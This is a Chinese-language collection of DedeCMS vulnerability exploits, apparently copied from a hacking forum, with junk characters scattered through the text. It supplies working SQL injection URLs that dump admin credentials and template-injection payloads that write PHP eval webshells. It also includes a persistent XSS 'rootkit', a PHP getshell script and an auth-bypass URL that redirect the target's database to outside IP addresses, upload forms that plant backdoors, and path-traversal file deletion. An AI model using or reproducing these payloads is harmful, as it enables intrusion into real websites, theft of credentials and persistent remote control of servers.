|
|
+ |0 u8 a7 }; l$ Q; v" k- }Dedecms 5.6 rss注入漏洞
0 `' {' s$ z' s; Fhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1% ~2 x8 f1 }. V. _# y
& j2 s) e. d# |3 ?" M; v3 W$ x% m5 w5 B' {6 A. b9 t- k
. M! D, Q4 M8 {! s2 U3 }% v8 U; T( f! v
7 Z8 I3 k! R' k+ D3 A4 g% g
; f, w! S! ]# B0 [+ [- ]
0 X% j# ]" t) t0 q" k- W+ P& ~, V* V, E6 P" L3 ?8 {: ~3 r
DedeCms v5.6 嵌入恶意代码执行漏洞
' h8 x, C% Z! j+ h& b注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
4 ~2 x" |4 y; f( s5 s% d- Y4 r发表后查看或修改即可执行1 r( {/ T! \) j8 J1 \
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
# t' z3 e+ e2 N生成x.php 密码xiao,直接生成一句话。# [! w. j J2 Z% X1 D$ }
: H/ E2 i \: q- Z
/ p- j, ?1 Y' H+ U' C
3 P- o; e* k' Z6 k: |1 G
?7 j; u5 ]6 U: o; `$ l6 S6 j) F& Z4 v
) i7 [& z6 B; y. z* D+ T. Q4 k& M N* s+ t
$ S2 C8 d% [( ^3 m' m, mDede 5.6 GBK SQL注入漏洞
" P, G. w" k, W2 shttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''; I, E5 Y) n/ n, K
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
; D% z7 m' @# }5 Jhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
& b2 i7 m- U% r% | F: U! j; o- n
( c0 n: b9 J b
+ [0 U0 \" a8 s. K- t1 `
5 a. r. x; ~2 ^( C' L' j, n3 v, y$ f# J! Y# Z: _2 d( A
8 f1 Y0 j! v" X! ?
2 l' ~' a# }" j! [/ J
* F3 M% w. }" H/ r' q# c' h4 B
7 f& z$ [+ @7 o) cDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
. O# U7 ?5 x! g% S8 @% J, J( Thttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
+ |8 }4 C8 s$ p4 v1 V! X9 O4 B
8 \0 S7 N: Y9 K3 {( m2 g( F5 _5 w
4 ^; ?' S9 ~! J& E1 H. V) f& |1 w; S/ ~
5 u3 B9 m+ h. k4 s0 ]8 q% ?
5 ^3 |3 K$ X3 H
9 ]; v# t+ z, c8 ]DEDECMS 全版本 gotopage变量XSS漏洞
0 L+ O2 v* t5 T' x$ z9 V. [1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 7 S- T8 p4 B7 b* K' `- _; |9 M
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
% ]5 s& f! O+ k5 o( Y$ d* b/ e0 s2 ~; C* G6 ?
0 y2 T" R& v. n$ K* F5 z7 o1 ~# G! N2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
' `, c ~( F% H6 Z/ d" {% Dhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
& B/ h. k& P3 i4 u& u! \1 Y$ W! ]- h$ K" h
* ?8 h3 A' j& o2 d$ |0 `& k$ d5 L& p
http://v57.demo.dedecms.com/dede/login.php
9 t- ]6 w% M$ V( K
; D; U+ W; x O! I5 J0 L& U% I$ z" `2 [/ Q, g: |2 `& T. X! }# ^% o
color=Red]DeDeCMS(织梦)变量覆盖getshell7 C; Z1 n+ `3 O% o7 ]2 R2 P( K6 G
#!usr/bin/php -w7 ]( D8 o4 A0 ` p0 V4 M# f
<?php6 t# ?4 ?) c) Y. X
error_reporting(E_ERROR);6 O0 X& e$ q5 D6 Q0 y* [1 Q5 l- b
set_time_limit(0);
( `& E! Y7 U& ?# q+ a) [ t) Bprint_r('! m: q, {0 u: N7 |
DEDEcms Variable Coverage, b% b! t" ~* ~- f! Y/ w3 h
Exploit Author: www.heixiaozi.comwww.webvul.com* ? c5 p5 J4 T3 h) x
);4 u/ |/ y: L# F1 \
echo "\r\n";
% g' w r! ^! R$ @. M1 Eif($argv[2]==null){
k7 m/ K/ X3 zprint_r('
! |7 T# Q' j" h4 D+---------------------------------------------------------------------------+1 \3 M+ N& G8 K( K- `% i
Usage: php '.$argv[0].' url aid path# B6 w, b4 M0 Y
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/! S% h; R, _. S# I
Example:# C* k7 ^4 s$ n2 M& J7 O8 i
php '.$argv[0].' www.site.com 1 old
- ^- r3 f4 }4 W/ N+---------------------------------------------------------------------------+$ o% @' h0 S: R9 Q
');
- t6 n: {* y: l% ?7 `4 U: K0 U' `exit;! f( i0 h% Q( B3 I9 T& x& G
}
+ w8 R6 `9 t4 O+ ?0 `( A6 F$url=$argv[1];. y# C# _+ U7 \* ] z2 K
$aid=$argv[2];
' X4 t4 V. e/ O( D/ M. F# }$ v$path=$argv[3];+ r3 x/ @; L+ c, C) o V6 s" E: t
$exp=Getshell($url,$aid,$path);) l" a8 s& |, C
if (strpos($exp,"OK")>12){1 H' T$ @( z3 V/ m/ a7 C6 l/ R
echo "
: w8 k9 P3 x$ ^/ \; u: {, _& jExploit Success \n";
1 \3 |: `) ~- T7 [1 dif($aid==1)echo "% ]. u& u- b" A7 n- g4 t
Shell:".$url."/$path/data/cache/fuck.php\n" ;7 N8 h j7 N6 m1 z4 I0 R* `# |$ [
& y7 J1 @, ], E9 y4 Y% D! w/ d) m' m) P; L
if($aid==2)echo "
J# k, z6 n% ^* p% @3 R: dShell:".$url."/$path/fuck.php\n" ;. K. r" J7 J6 O1 T' @; J, o! b
0 D1 l/ b1 e s' h0 p
2 x+ Y* q" F) I- Aif($aid==3)echo "
" `2 E- r$ } v2 r. l' _* yShell:".$url."/$path/plus/fuck.php\n";4 s5 M) J8 q6 ?; [4 b( c
0 i; v* M( B& z4 Y, L5 f5 c l4 K" X$ I/ z$ z5 d
}else{1 F9 \ ^- J. A; y5 S4 B
echo "
) f( m& ?: G9 T+ nExploit Failed \n"; Q6 D" B) b4 Z) ?/ r& g7 E
}4 m* ?( c; a0 C+ m4 h p
function Getshell($url,$aid,$path){
2 `6 u' H) K, `; E$id=$aid;% v6 ^$ `7 F8 y. }2 C9 f
$host=$url;! [- C0 T/ F/ m' L5 |
$port="80";( k) O/ C" W% P1 g( N
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% f- v& G( v# ^3 O7 q
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
& ]7 }: @# G$ K: t$data .= "Host: ".$host."\r\n";
, I" T+ r N* v2 X: \0 H1 U% Q$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n"; S! X5 b# ]0 ~- ~$ w
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
! f% S3 J/ ]3 r0 u/ @8 C1 g. \$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";1 O5 k& v& E' u# y9 n4 \5 y$ b! m
//$data .= "Accept-Encoding: gzip,deflate\r\n";8 \4 Y ] B# r: ^8 }1 C
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";) }5 [7 }+ ^3 o) ~5 i! \# k3 o* |# n
$data .= "Connection: keep-alive\r\n";
# q9 D0 @% ^$ ^$data .= "Content-Type: application/x-www-form-urlencoded\r\n";. p3 o( u% g3 c% h
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
1 O- ]2 l2 J8 Z$ v5 m3 H$ S: A# l: m$data .= $content."\r\n";
) ]+ m" \3 j# X( D$ W* o: p$ock=fsockopen($host,$port);
! d! S* S9 z( B7 K$ P. A" Gif (!$ock) {, C( X8 w* U3 z- |$ n
echo "! t1 O$ |; L8 d2 l5 F
No response from ".$host."\n";" g2 x2 @* S6 h
}
/ P9 e. t- l! C g9 O* a; {& T3 Afwrite($ock,$data);8 e1 e3 s+ @0 l/ ?* o% \- H+ {7 @
while (!feof($ock)) {
, Q" v% a0 E' F$ X$exp=fgets($ock, 1024);: u) q' @- H$ k
return $exp;
, Y8 P$ k) r4 l% X}
C# s7 J0 u$ V) [6 l' k}
$ X, a$ L' c9 d) m! Z! A, B% R& N& {7 M2 n
4 S8 x) p8 a! v+ d
?>5 V; [! ~( K: q& m
, x' ~) O+ a) \
! [1 L% E8 _3 C: ^8 o E1 R
3 z- {* g1 D9 z5 r9 z! o( d8 N) q' h
- p5 T& Q9 H) V* Z. ]: A+ G, o- E
8 U. r) n. i0 T( ]" E/ V, I9 t! l* A
5 D& p6 C9 A' }/ S$ l$ z% |$ K& t {9 h. I+ }: i+ P3 V& @
: L6 n2 v9 Q9 O, z3 n
5 w1 w4 I2 j) N3 a5 J& f2 ?5 IDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)& e ~( W8 v+ c. D
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root+ Q+ S8 i1 r2 R, g5 y; D
3 _- b& w, G% d. G$ Y# i8 T3 L
0 e y0 i J! }% N3 W# F& g% r把上面validate=dcug改为当前的验证码,即可直接进入网站后台
0 n2 K0 Y5 N/ e( h; E. z) m: U7 V( C5 T% \! [# y8 N
( a9 M3 m' n' L* Z此漏洞的前提是必须得到后台路径才能实现. E0 _' v4 }+ k2 A6 k
, Z* I/ a" z" A
6 ^" q6 L0 v$ z+ G0 C/ L
$ m5 Z$ J* T2 n- e7 ]1 ^2 e. P0 m
. f( @8 U9 k3 z% K# B ~
# r" ^* u$ Q1 g( e- H/ d1 `7 t
( X" ?9 ?6 |7 X: B! o5 ?. _6 n& @" M! j
8 I: v I" v* O% A6 W9 Y+ w: n! ~
$ ^( \( M! w* l7 y v- K }) o- J! ?! s3 ?0 Z3 [+ q5 a
Dedecms织梦 标签远程文件写入漏洞
+ K4 N" E6 i" h; d前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');2 R- i% {: M1 Y
{! R+ ]# \9 H5 I
- i r1 ]( J* w2 ?# n9 H9 @
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
' q b g) p9 t" S6 |* v<form action="" method="post" name="QuickSearch" id="QuickSearch">9 p5 l- t& E! M0 C8 M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; B* v( z6 \8 ?) A
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />( G" f. u) I6 N4 _0 L
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
! n- d" f: O' n- Q<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
$ r4 O3 Q3 |: U. z- Y4 u<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
3 a- v1 X" s" u/ |. _+ W0 Z8 ^<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
3 t1 [3 m7 {( K: S& `9 U5 S<input type="text" value="true" name="nocache" style="width:400">. F& p$ j5 @" I2 N
<input type="submit" value="提交" name="QuickSearchBtn"><br />
9 Z |; U$ w! \" @$ s5 D</form>
: m1 O7 k4 P- u1 M& ~<script>5 o) z2 q, {' d8 E, f
function addaction()7 \. j, m% A/ d+ ?2 |) t( B9 H
{
+ v( p; a. s/ ]( ydocument.QuickSearch.action=document.QuickSearch.doaction.value;" ?& f) t8 h4 n2 }7 q/ R
}
2 k) @4 L0 r, g0 x% S</script>8 `: L( g/ f% v' E9 t
# g1 o# s+ \3 S* H- t
. T3 b/ r- V: M9 b8 p& v8 J. V
8 {6 C1 F+ a0 @' h' r9 ?) `
. w+ G$ X9 s/ q- g. b, m6 f' r
I+ j* ]/ L& z
& z0 d* ~4 H) a& B) y
% }) R- Y; |9 i! k" E ?* b' [$ d6 `6 O# J% K: _% |; n
4 W6 u- M+ }4 ^! l
, T8 Y* Z& U9 E; t* h4 a8 X2 c2 o; w! K
DedeCms v5.6 嵌入恶意代码执行漏洞
8 F" D0 O7 R9 M6 v5 z注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行. U3 X0 B. g0 p! S& [% S
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
" C; R( y$ ?& S+ p5 u生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得( s) Q& y1 A( K$ O% H1 V; L: y. u
Dedecms <= V5.6 Final模板执行漏洞* A% S6 Q2 `* e* f) y+ R
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:6 h( K0 W7 T4 }7 y8 M
uploads/userup/2/12OMX04-15A.jpg
6 E* Y( h* L3 v/ q3 V7 Z, @! {* l" P' j
: ^+ K( k. W8 x% f D5 Y模板内容是(如果限制图片格式,加gif89a):
0 g9 g/ e& F; Y6 m2 K4 C2 @& \{dede:name runphp='yes'}7 C1 V& |7 E( F4 q
$fp = @fopen("1.php", 'a');/ Q5 h3 O# }. B: ]
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
- ]+ |; \& |! C5 Y@fclose($fp);
, ]0 x6 b% M' V! |* l{/dede:name}
' v$ F7 Y3 f0 q" p! |2 修改刚刚发表的文章,查看源文件,构造一个表单:
N; h' t6 B$ |0 ?/ h5 V! G& V<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">6 M( u5 M2 K8 j% N& V
<input type="hidden" name="dopost" value="save" />' ^$ c4 a1 M# k/ m
<input type="hidden" name="aid" value="2" />0 N7 y8 S& p. [; m+ G" O9 p6 v
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
( s6 }9 k x2 G<input type="hidden" name="channelid" value="1" />; \& P. X1 g) l* h
<input type="hidden" name="oldlitpic" value="" />
& M/ ~0 I" o" V" X9 |4 B a5 O8 N7 G<input type="hidden" name="sortrank" value="1275972263" />
! o7 J/ [! b4 C+ }* H$ X
# l7 [+ `0 s" p0 j4 h4 ^# ^7 y3 w2 E1 L. e# D
<div id="mainCp">
0 i; V) ?# z* o2 Z$ M$ h; D<h3 class="meTitle"><strong>修改文章</strong></h3>( } \" i% l. r" ?
" O8 s5 J5 M3 h$ H" p$ z9 X
1 v4 ^$ t, _" i& c" e' ]
<div class="postForm">+ _+ i( @6 C* _3 `$ U) Q* ?$ G8 t
<label>标题:</label>, S2 o7 |, P( w( s; P
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>5 d+ s5 u8 s6 [% [( B
- O. c; \- Q& |8 q% |* u# L% G+ u9 e, C
<label>标签TAG:</label>+ U4 ]5 ]& b8 p2 _6 l& U
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)$ ]+ ^" O$ A) M9 V; q
1 j3 E+ C$ U7 R" M; z; R; [& o; _( L+ P& X2 |3 D3 ~9 l/ g
<label>作者:</label>% {+ j/ H4 a+ ]9 Z1 p& z7 _* m
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
7 i& M" M8 C: z' {' q9 Y0 r: d* |) c4 A/ L
) {* l0 d3 N2 p. k<label>隶属栏目:</label>
% s/ Z" b- o% B+ q" t1 o<select name='typeid' size='1'> j0 y( M8 f I8 g
<option value='1' class='option3' selected=''>测试栏目</option>. s2 d% E4 ]/ S" n
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)8 i. g9 I, P y7 O2 a) k
f6 c2 A6 e/ l- {% V9 V
! o8 I+ ?3 |( L
<label>我的分类:</label>
( Q- V1 S: ~' b, Z9 T. Y2 u, f+ H<select name='mtypesid' size='1'>- G6 ^6 {4 A+ K# p3 _3 k
<option value='0' selected>请选择分类...</option>
0 Y% L G6 m& h/ n& q<option value='1' class='option3' selected>hahahha</option>
. I8 ]" V0 ^" b) x</select>
& n$ X% s) W$ L
3 o( E1 p5 s' f
$ R( \. E; f, Z<label>信息摘要:</label>+ a" C) O* y' }! a
<textarea name="description" id="description">1111111</textarea>
5 V6 W+ q w& l% \4 ?2 s+ Q(内容的简要说明)2 ?; w, Z( K& g" P
% b7 T9 b! O8 e1 t: c
8 n4 ]9 m4 S5 i$ \<label>缩略图:</label>' M& X* u- A0 s& Y) s4 h+ h
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>; X; t9 r; i* M% ]& L% B
6 D, u, x& h7 G5 w# x! t+ k/ Q ]- }0 b8 N
<input type='text' name='templet'
9 H: W* V8 T7 m/ Q4 e* uvalue="../ uploads/userup/2/12OMX04-15A.jpg">/ t1 w0 ]% b0 J5 h& B6 x& S
<input type='text' name='dede_addonfields'
: A' p$ {9 \. |' Cvalue="templet,htmltext;">(这里构造)
+ Z, [) q% d& O( `+ K( U3 ?</div>0 C5 @4 t6 L$ w* e+ {. B
g( h! n7 \2 m7 e0 J w: f# ]4 |8 I+ l, R [
<!-- 表单操作区域 -->
0 U0 ~4 S$ O& i<h3 class="meTitle">详细内容</h3>
/ g! X8 y; I0 k# m4 O( _
; f% a r1 s4 G3 X" ~/ x% w y- @
<div class="contentShow postForm">3 N/ o9 [- `6 j0 b. r( g
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>* S6 d4 b# Q- t
. j0 [# j% E \- P: Q
0 [+ Q, _* P5 ^' s2 \5 ^<label>验证码:</label>2 o' W: O5 }# ?, e# D
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />2 |5 ]+ x! H. | q: q. j
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
2 [4 M# V1 h. Q; \8 C; z2 @0 b5 G7 B- Q& Q7 {# k
# c; x; R* x; l# U& n
<button class="button2" type="submit">提交</button>. \) }* e& v/ i+ B
<button class="button2 ml10" type="reset">重置</button>
" l7 _7 X6 B. H- S+ ^7 s</div>
$ @# g: E; J- B
7 Q* ^: ]$ M5 p. \
7 i: n7 x0 T8 X2 L6 f, K: Q( @0 {</div>5 i" [- E, d6 o; D
4 d$ q9 f, t0 k! a! @
4 E" J+ R8 X. J" \</form>
/ |4 I2 H( Z4 M
9 R% q7 u, W/ E, _# k7 k( i$ \! ^2 K6 g
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
t$ x$ e% Q% j& p$ @假设刚刚修改的文章的aid为2,则我们只需要访问:! a! M, n' [% P/ g) Z4 k0 z% `
http://127.0.0.1/dede/plus/view.php?aid=2
% P; N5 N# ?4 l# G* L1 [, t即可以在plus目录下生成webshell:1.php
) r, [' u h8 R& f& l8 h% \7 f0 N/ P: Z
6 h: M% P9 n- ?: J+ x) a8 p% d2 u3 K f. I7 e
* @) Q2 `+ i* l& v$ b9 s6 a+ K: I! o, _5 i' J7 N
; [+ o+ L+ H7 B7 D; H2 h' P$ E& L, Z/ v4 c! ], g; p- b
! r. C" f9 K; u6 d
) G4 c" ]2 \& n9 F* R" P7 w. x. @* `0 l
, s' y2 k3 x8 ]
. l# a6 {4 W. w5 ADEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
( v: s/ Z f0 L4 o$ s4 D- jGif89a{dede:field name='toby57' runphp='yes'}
& X6 B+ ^$ O \0 g9 \4 _, k9 Aphpinfo();" j2 M& y; R5 u: }* y' t( @. x
{/dede:field}
) w/ D: h7 [$ g4 A2 M保存为1.gif
4 J8 l9 @8 E' I2 ~" Q6 T8 F" }<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
; I% ]) d2 E9 O/ @6 E: [$ r" z3 H<input type="hidden" name="aid" value="7" /> * o7 H! J. R4 S# N
<input type="hidden" name="mediatype" value="1" />
/ \+ h2 n9 S5 V9 F. l, @) _<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 5 ]5 f. {* `. m
<input type="hidden" name="dopost" value="save" /> : ?1 b) y1 F; s: R$ p# F
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ' ^) O# j% f) p8 Y# [: K
<input name="addonfile" type="file" id="addonfile"/>
$ Y" f. `! k+ Z0 j% ~5 C/ ]: P<button class="button2" type="submit" >更改</button> ; M+ U) T3 B, k* M# _
</form>
$ [0 M) @3 V& Y* V0 i% Z* m+ ^/ K( X( K! {
9 e0 ^. u$ O: Z, d2 l; c7 Q% D6 D
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif/ |( z+ ^" v; _4 Q( {7 B; c7 q0 l
发表文章,然后构造修改表单如下:
* N; z; R4 c9 n t' x/ b2 F0 U; {0 i$ N1 _
6 s3 u; Q- [$ C6 {<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
0 H; B9 I- [" N8 |7 o<input type="hidden" name="dopost" value="save" /> , o! I; W5 K! Z7 S
<input type="hidden" name="aid" value="2" />
5 d; ]# ?, h* u7 R<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 1 U* V4 Y: A' T
<input type="hidden" name="channelid" value="1" />
4 F9 H6 H6 y" c3 X1 l# s<input type="hidden" name="oldlitpic" value="" /> 0 A/ s* H$ `, J6 m6 V0 ?
<input type="hidden" name="sortrank" value="1282049150" /> 4 F2 o* m3 D2 W! r
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 0 T0 j. ^6 c, I9 U
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 7 L( k5 h6 X' `$ T! [- @. @" V& A; t
<select name='typeid' size='1'> % L# R1 I0 a8 @! V: E: Z0 l
<option value='1' class='option3' selected=''>Test</option>
3 {3 W- r1 _% [! h<select name='mtypesid' size='1'>
" V' V1 D8 f. Y# }7 r<option value='0' selected>请选择分类...</option> 0 ?5 j. |3 D+ Y# P
<option value='1' class='option3' selected>aa</option></select> + o0 H0 O% `8 O& A' i
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
) ^5 w' n7 l+ k a1 r0 Z$ u<input type='hidden' name='dede_addonfields' value="templet">
h5 u8 I2 t4 A" ?# ]5 y- j<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> / M/ P: V* H; F4 j
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
( e+ u# U9 A/ D<button class="button2" type="submit">提交</button>
5 E: D" G- r) D! Y9 L</form>
7 B) q/ u/ k& k3 e+ @ M a3 [; d7 M( `- W! T0 G- j
+ b3 \* b+ ~* t; P y% ?- H- w. A8 ^. f [- y3 d
9 q% S, u) o; \; i
" ~! X/ E2 J9 A' Y
& f* |, [( ]# }8 d) F7 P' Y. \# m+ X: B+ f8 K
/ g+ D3 k+ T9 O! L+ v: E! C/ Y% e
8 T* g8 d# H# n" K3 q3 M
" b& K$ V$ b& N) J# m
; t+ L2 L. j5 d8 U% E% |) T$ r5 ^$ L& u4 |
织梦(Dedecms)V5.6 远程文件删除漏洞: L6 U5 v' V2 x" k# }+ r6 ]
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
$ G* d6 @' [9 F
* e2 \5 I4 L$ W' j+ _8 D, H' o2 g& H0 k6 Q/ \4 f0 P2 Q. \# _
! o3 u+ k. K! y! T6 j7 \
5 f$ v6 K) v0 z! j j. d5 {) q. a( U
4 H4 q5 k2 U* U" |
1 q( H. r7 K* a" ~+ f
$ S1 c' [ w2 o- f9 ?% }& a# D# a' f& h) e4 Z; ~6 k' Y
+ {' m: e( T" A& d x" m7 t
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 9 R& ?9 y4 }& c3 l
http://www.test.com/plus/carbuya ... urn&code=../../
1 u( E) i6 y4 v: r0 a( e9 w4 c( j% y0 l; |& e4 [3 C
6 L t. p$ B: [ \/ S
8 p. _: l; w- l+ o; r1 P2 T4 Q- O4 F3 a& @- y, ]3 H! i0 c
- J' V2 v7 A; v
) [/ E8 v/ i) m5 k p3 X! p3 U- E8 E+ i: ^: \8 U) ^
. u& J* s6 L# h# x0 Z% J. Z
n9 Q# I# ~6 C" t, V f1 h5 a6 `/ F( w0 o% H7 d& O
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
4 d4 Y8 M$ n. t1 v! [5 L6 k# Fplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
: c& }3 \2 Q' a: ?密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
% _1 _" c# V% q" r( d5 T, B% S
7 n4 n. v& C0 f% |& x4 B2 M1 J
0 r8 v h n- Z" G1 `" |
3 R) C6 P/ c2 W B, [1 Y- J' c7 P; B) V' q
( f/ ^ [1 c s0 J( Y1 A
9 S+ F: e4 j* C+ S" ^5 } \
) F% q$ [$ c7 D* Z; V* I8 a1 o9 U
# {6 d. w* n5 J/ e! ~ h
8 _' U9 J t6 O" @织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
5 p! K( g5 u3 G: I% O6 }" Ahttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
; c' ~" [1 e, V& i# P0 `7 |4 ~ m3 }+ j- A6 B0 [
9 z% j6 B+ h2 n) O
1 p$ K; q' D7 X! k! V
4 D' p- E1 E- o8 l' o: z$ X3 k8 B/ |& w4 n
2 i6 _4 W' F- f
2 g0 l/ k8 o! \: s
' T& ?# _+ s% S2 y
/ N& l: v$ X2 v `- f9 y
: C' I4 K7 V0 l1 K2 ]: r8 p
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞- p5 ?# C- g4 ^/ M: k. w( o% c: L( ^3 x
<html>
: v3 y% b% D% i( a! G* T- X<head>
0 V) X# V# L8 v/ w2 ^# `<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
